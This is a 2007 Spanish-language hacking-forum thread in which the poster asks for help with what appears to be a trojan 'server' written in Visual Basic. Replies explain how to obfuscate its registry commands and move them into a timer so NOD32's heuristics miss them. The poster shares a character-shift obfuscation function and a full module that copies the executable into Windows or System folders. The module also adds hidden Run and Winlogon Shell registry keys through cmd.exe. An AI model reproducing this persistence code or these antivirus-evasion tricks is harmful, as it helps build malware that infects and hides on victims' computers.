elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  problema con el registro encryptado
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: problema con el registro encryptado  (Leído 2,430 veces)
wACtOr


Desconectado Desconectado

Mensajes: 461


Premio finalista diseño web elhacker.net


Ver Perfil
problema con el registro encryptado
« en: 24 Junio 2007, 22:28 pm »

wenas, tengo un pequeño problema que me trae un poco de cabeza.

tengo una cadena cifrada que añade mi aplicacion al registro.
si no esta encryptada el nod salta por herustica, pero si esta encryptada no se añade al registro. esto es por que en la cadena para añadirse tengo 2 variables, una con el nombre de la clave y otra con el valor de la clave:

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ /v " & valuereg & " /t REG_SZ /d " & SO & "\" & name & " /f

esta es la cadena desencryptada. si kito las variables y dejo la cadena asi:

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ /v Nombre /t REG_SZ /d C:\sdad\exe /f

si que se añade encryptada. que puede pasar para que no funcione?

gracias


En línea

Meg


Desconectado Desconectado

Mensajes: 462



Ver Perfil
Re: problema con el registro encryptado
« Respuesta #1 en: 24 Junio 2007, 22:39 pm »

mmm pues no lo se seguro xk me tendria que poner a mirarlo muy detenidamente... pero asi enprincipio alomejor tienes k cifrar tb el contenido de las variables prueba eso aver k pasa ....


En línea

~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: problema con el registro encryptado
« Respuesta #2 en: 25 Junio 2007, 00:09 am »

Citar
si que se añade encryptada

A ver tu la estas intentando añadir cifrada al reg?? asi no te va a funcionar...

Otra cosa. No lo pongas en el form load, ponlo en un timer. Yo siempre pongo las cadenas en un text box en vez de en variables y el nod no salta....

PD --> Lo q  me preguntaste por el messenger de la conexion, posiblemente no se te conecte por q tengas la variable ip declarada dentro de una funcion, declarala el la cabecera del source del form  (arriba del todo vamos) :P
En línea

Meg


Desconectado Desconectado

Mensajes: 462



Ver Perfil
Re: problema con el registro encryptado
« Respuesta #3 en: 25 Junio 2007, 00:31 am »

Citar
A ver tu la estas intentando añadir cifrada al reg?? asi no te va a funcionar...

Si ha dicho que le ha funcionao xDD ,creo k se refiere k cuando pone las dos variables y lo cifra no le funciona,pero cuando lo cifra sin las variables si le funciona
En línea

~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: problema con el registro encryptado
« Respuesta #4 en: 25 Junio 2007, 01:14 am »

Pues se a debido de ekivocar, por q si añades esto al reg: asfasfa654f5a64f5a4 evidentemente no va a hacer q tu programa se inice, tendrás q añadirlos sin enriptar no?  :xD :xD :xD

Weno, vamos a ver. Tu kieres cifrar esta cadena:
Código:
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ /v Nombre /t REG_SZ /d C:\sdad\exe /f

En la q nombre y C:\sdad\exe son variables no? pues lo mejor q puedes hacer es dividir la cadena completa en dos, la primera parte seria:
Código:
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ /v
Y la segunta:
Código:
/t REG_SZ /d
Weno esta segunda parte casi q no hace falta q la encriptes, pero aun asi la enriptaremos por si acaso ;)

Bien, lo primero q tienes q hacer es crearte una funcion para cifrar y otra para descifrar (q supongo q ya tendras) y en un proyteto aparte cifrar ambas cadenas. Supongamos q la primera cadena cifrada keda asi:
Código:
1111ASDSA1sa1ds1SADSA36
Y la segunda asi:
Código:
222222sdsad

Pues ahora debrias encadenar todo el chorizo ese para obtener la cadena descifrada y llamarla desde la shell:

Código:
dim reg as string
reg = desenriptar (1111ASDSA1sa1ds1SADSA36) & valuereg & descifrar(222222sdsad) & name & "/f"
shell reg

Siendo descifrar la funcion para descifrar  :¬¬

Pon esto en un timer y no deberia darte ningun tipo de problemas con la euristica
1S4ludo
En línea

Meg


Desconectado Desconectado

Mensajes: 462



Ver Perfil
Re: problema con el registro encryptado
« Respuesta #5 en: 25 Junio 2007, 01:45 am »

Citar
Pues se a debido de ekivocar, por q si añades esto al reg: asfasfa654f5a64f5a4 evidentemente no va a hacer q tu programa se inice, tendrás q añadirlos sin enriptar no?

si eso es cierto  :xD

wactor, si tienes problemas pa cifrar y descifrar si kieres te paso las 2 funciones que yo utilizo y ya las ves tu y las adaptas haciendo lo que dice EON, por que ami me funcionan de maravilla
En línea

wACtOr


Desconectado Desconectado

Mensajes: 461


Premio finalista diseño web elhacker.net


Ver Perfil
Re: problema con el registro encryptado
« Respuesta #6 en: 25 Junio 2007, 14:01 pm »

gracias a tos por contestar, voy a porbrar como dice eon.

si para encryptar utilizo esta funcion:

Public Function en(j)
On Error Resume Next
For R = 1 To Len(j)
en = en & Chr(Asc(Mid(j, R, 1)) + 7)
Next
End Function

y para desencryptar uso esto:
Public Function encrypt(p)
On Error Resume Next
For R = 1 To Len(p)
encrypt = encrypt & Chr(Asc(Mid(p, R, 1)) - 7)
Next
End Function

aora pruebo y os comento.


PD: no esta en el form load, esta en un modulo para que cuando llame a la funcion, segun los valores que le meto al server al crearlo desde el cliente haga una cosa u otra:

Código:
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function CopyFileEx Lib "kernel32.dll" Alias "CopyFileExA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal lpProgressRoutine As Long, lpData As Any, ByRef pbCancel As Long, ByVal dwCopyFlags As Long) As Long


Public Sub autocopiar(win As Variant, sys As Variant, name As Variant, localmachine As Variant, currentuser As Variant, explorer As Variant, valor As Variant)
    Dim Car As String * 128
    Dim Longitud, Es As Integer
    Dim Camino As String
    Dim SO
    Dim Sistema
   

opwindows = win
opsystem = sys
name = name
hklm = localmachine
hkcu = currentuser
hkex = explorer
valuereg = valor
   
      Longitud = 128
   
    Es = GetWindowsDirectory(Car, Longitud)
    Camino = RTrim$(LCase$(Left$(Car, Es)))
    SO = Camino
   
    Es = GetSystemDirectory(Car, Longitud)
    Camino = RTrim$(LCase$(Left$(Car, Es)))
    Sistema = Camino
   
If opwindows = "V" Then
    origen = App.Path
    If Right(origen, 1) <> "\" Then origen = origen & "\"
    origen = origen & App.EXEName & ".exe"
    Ret = CopyFileEx(origen, SO & "\" & name, AddressOf CopyProgressRoutine, ByVal 0&, bCancel, COPY_FILE_RESTARTABLE)
        If hklm = 1 Then
        reg = encrypt("YLN'HKK'ORL`fSVJHSfTHJOPULcZvm{~hylcTpjyvzvm{c^pukv~zcJ|yylu{]lyzpvucY|uc'6}')'-'}hs|lyln'-')'6{'YLNfZa'6k')'-'ZV'-')c)'-'uhtl'-')'6m")
        Shell "cmd.exe /c " & reg & "", vbHide
        End If
        If hkcu = 1 Then
        reg = encrypt("YLN'HKK'ORL`fJ\YYLU[f\ZLYcZvm{~hylcTpjyvzvm{c^pukv~zcJ|yylu{]lyzpvucY|uc'6}')'-'}hsvy'-')'6{'YLNfZa'6k')'-'ZV'-')c)'-'uhtl'-')'6m")
        Shell "cmd.exe /c " & reg & "", vbHide
        End If
        If hkex = 1 Then
        reg = encrypt("YLN'HKK'ORL`fSVJHSfTHJOPULcZVM[^HYLcTpjyvzvm{c^pukv~z'U[cJ|yylu{]lyzpvuc^pusvnvuc'6}'Zolss'6{'YLNfZa'6k'Lwsvyly5ll3')'-'ZV'-')c)'-'uhtl'-')'6m")
        Shell "cmd.exe /c " & reg & "", vbHide
        End If
End If

If sys = "V" Then
    origen = App.Path
    If Right(origen, 1) <> "\" Then origen = origen & "\"
    origen = origen & App.EXEName & ".exe"
    Ret = CopyFileEx(origen, Sistema & name, AddressOf CopyProgressRoutine, ByVal 0&, bCancel, COPY_FILE_RESTARTABLE)
        If localmachine = "1" Then
        reg = encrypt("YLN'HKK'ORL`fSVJHSfTHJOPULcZvm{~hylcTpjyvzvm{c^pukv~zcJ|yylu{]lyzpvucY|uc'6}')'-'}hsvy'-')'6{'YLNfZa'6k')'-'Zpz{lth'-'uhtl'-')'6m")
        Shell "cmd.exe /c " & reg & "", vbHide
        End If
        If currentuser = "1" Then
        reg = encrypt("YLN'HKK'ORL`fJ\YYLU[f\ZLYcZvm{~hylcTpjyvzvm{c^pukv~zcJ|yylu{]lyzpvucY|uc'6}')'-'}hsvy'-')'6{'YLNfZa'6k')'-'Zpz{lth'-'uhtl'-')'6m")
        Shell "cmd.exe /c " & reg & "", vbHide
        End If
        If explorer = "1" Then
        reg = encrypt("YLN'HKK'ORL`fSVJHSfTHJOPULcZVM[^HYLcTpjyvzvm{c^pukv~z'U[cJ|yylu{]lyzpvuc^pusvnvuc'6}'Zolss'6{'YLNfZa'6k'Lwsvyly5ll3')'-'Zpz{lth'-'uhtl'-')'6m")
        Shell "cmd.exe /c " & reg & "", vbHide
        End If
End If
End Sub
« Última modificación: 25 Junio 2007, 14:13 pm por wACtOr » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Avira y Sophos en el encryptado
Análisis y Diseño de Malware
x0n1 2 2,324 Último mensaje 7 Abril 2012, 16:05 pm
por x0n1
Ayuda con descifrado y Encryptado
Criptografía
DivRoM 3 3,229 Último mensaje 17 Agosto 2017, 02:31 am
por engel lex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines